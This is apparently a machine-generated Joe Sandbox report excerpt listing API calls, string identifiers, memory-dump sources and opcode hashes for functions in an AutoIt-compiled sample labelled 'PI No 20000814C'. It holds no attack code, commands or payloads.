                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: GlobalMemorySleepStatus
                                    • String ID: @
                                    • API String ID: 2783356886-2766056989
                                    • Opcode ID: 2d86d500486c9d43897385b682b76add54a4ad76adec08b053bcfc5f6df6ab8e
                                    • Instruction ID: 19f86591a911e18d391462928f21ac1257d71bf96100f1b03fa106612a54d507
                                    • Opcode Fuzzy Hash: 2d86d500486c9d43897385b682b76add54a4ad76adec08b053bcfc5f6df6ab8e
                                    • Instruction Fuzzy Hash: CB515A715187489BD320AF14DC85BAFB7E8FFC4310F42485DF2D9410A2EBB49529EB26
                                    APIs
                                      • Part of subcall function 00F0506B: __fread_nolock.LIBCMT ref: 00F05089
                                    • _wcscmp.LIBCMT ref: 00F69AAE
                                    • _wcscmp.LIBCMT ref: 00F69AC1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _wcscmp$__fread_nolock
                                    • String ID: FILE
                                    • API String ID: 4029003684-3121273764
                                    • Opcode ID: c803e51a0c35844187085f22ff6e4efc93caa3213c4d33b1b7543501e01b7063
                                    • Instruction ID: 26bc5a058e1d3d89cc7a59c05f640ea3c526386c8682dc1fdc7cf687afbd7b2a
                                    • Opcode Fuzzy Hash: c803e51a0c35844187085f22ff6e4efc93caa3213c4d33b1b7543501e01b7063
                                    • Instruction Fuzzy Hash: 6B41DB71A0461ABADF209AA4DC45FEFB7BDDF45714F000069F904E71C1D6B99A04ABA1
                                    APIs
                                    • _memset.LIBCMT ref: 00F72892
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F728C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CrackInternet_memset
                                    • String ID: |
                                    • API String ID: 1413715105-2343686810
                                    • Opcode ID: 737bee99ef28111e68b0d9a1ff728d9c86342ed158180948963514739f75e16b
                                    • Instruction ID: cb55d026e351fe9ffc03dc887c32d642595bd8b53d6738916af5154ccc9299da
                                    • Opcode Fuzzy Hash: 737bee99ef28111e68b0d9a1ff728d9c86342ed158180948963514739f75e16b
                                    • Instruction Fuzzy Hash: 29315A71D01219AFDF01EFA0CC85EEEBFB8FF08310F14406AF904A6165DA355A16EB60
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 00F86D86
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F86DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    • Opcode ID: 25b0751f425e6e7ee46d65aba77d94f895bf83924d2f99584c22be3e7b399953
                                    • Instruction ID: e408711a0d62c907bdf43e132f501a9cab337fcac58475a1b4a3a1813cc5e77e
                                    • Opcode Fuzzy Hash: 25b0751f425e6e7ee46d65aba77d94f895bf83924d2f99584c22be3e7b399953
                                    • Instruction Fuzzy Hash: AA319E72600204AEDB10AF28CC80BFB73A8FF48720F108619F8A5D7190DA35AC91EB60
                                    APIs
                                    • _memset.LIBCMT ref: 00F62E00
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F62E3B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 970d10eae453c54416d3a12726681f8b861b0b821be7918b12bffc419e264281
                                    • Instruction ID: 2149b2c884bee0e3d23e037e58561d0d0badcf39f592e76c291d989c9386dcce
                                    • Opcode Fuzzy Hash: 970d10eae453c54416d3a12726681f8b861b0b821be7918b12bffc419e264281
                                    • Instruction Fuzzy Hash: 8C31F531E00709ABEB64CF48D945BEEBBB9FF15320F140439E985961A1D7759944EB10
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F869D0
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F869DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: c7ea3d9b1ce6e9660e128b150c56d53b84ae508770ebe8bb1b34cde1373659fe
                                    • Instruction ID: 25c25b2cedfb91faedd310fabbfe5a628925609f39320b0ad551c29a9565b493
                                    • Opcode Fuzzy Hash: c7ea3d9b1ce6e9660e128b150c56d53b84ae508770ebe8bb1b34cde1373659fe
                                    • Instruction Fuzzy Hash: 4F11B271B002086FEF11AF14CC81EFB376AEB883A4F114124F958DB2D0D6759C51A7A0
                                    APIs
                                      • Part of subcall function 00F01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F01D73
                                      • Part of subcall function 00F01D35: GetStockObject.GDI32(00000011), ref: 00F01D87
                                      • Part of subcall function 00F01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F01D91
                                    • GetWindowRect.USER32(00000000,?), ref: 00F86EE0
                                    • GetSysColor.USER32(00000012), ref: 00F86EFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    • Opcode ID: 45e4badc1872ffa5235240cd123f1bd9dcbbcc76469b69ad38d9f2c0ce188f5e
                                    • Instruction ID: 590c3f13508df59ad3529ae4f4f1df628627d224a274587a2ded17ff06d640ba
                                    • Opcode Fuzzy Hash: 45e4badc1872ffa5235240cd123f1bd9dcbbcc76469b69ad38d9f2c0ce188f5e
                                    • Instruction Fuzzy Hash: 16212972A10209AFDB05EFA8DD45EFA7BB8FB08314F044629F955D3250E734E861AB50
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 00F86C11
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F86C20
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    • Opcode ID: a560f1527831b37bdba38d1165e96b5314f89e78d7735eb028cf0e3ff35f7f12
                                    • Instruction ID: 6b5dd121f164ec27e6d8664fa1e25f8d571da344182028d38dd88c81e1c6dfb1
                                    • Opcode Fuzzy Hash: a560f1527831b37bdba38d1165e96b5314f89e78d7735eb028cf0e3ff35f7f12
                                    • Instruction Fuzzy Hash: 2E119A71901208AFEB10AF649C42EFA3769EB45378F204724F961D71E0C735DC91BB60
                                    APIs
                                    • _memset.LIBCMT ref: 00F62F11
                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F62F30
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F72520
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F72549
                                    Strings
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    APIs
                                      • Part of subcall function 00F7830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00F780C8,?,00000000,?,?), ref: 00F78322
                                    • inet_addr.WS2_32(00000000), ref: 00F780CB
                                    • htons.WS2_32(00000000), ref: 00F78108
                                    Strings
                                    Similarity
                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                    • String ID: 255.255.255.255
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00F5B0E7
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F59355
                                    Strings
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00F5B0E7
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F5924D
                                    Strings
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00F5B0E7
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F592D0
                                    Strings
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: ClassName_wcscmp
                                    • String ID: #32770
                                    APIs
                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F581CA
                                      • Part of subcall function 00F23598: _doexit.LIBCMT ref: 00F235A2
                                    Strings
                                    Similarity
                                    • API ID: Message_doexit
                                    • String ID: AutoIt$Error allocating memory.
                                    APIs
                                      • Part of subcall function 00F3B564: _memset.LIBCMT ref: 00F3B571
                                      • Part of subcall function 00F20B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00FC5158,00000000,00FC5144,00F3B540,?,?,?,00F0100A), ref: 00F20B89
                                    • IsDebuggerPresent.KERNEL32(?,?,?,00F0100A), ref: 00F3B544
                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F0100A), ref: 00F3B553
                                    Strings
                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F3B54E
                                    Similarity
                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F85BF5
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F85C08
                                      • Part of subcall function 00F654E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F6555E
                                    Strings
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd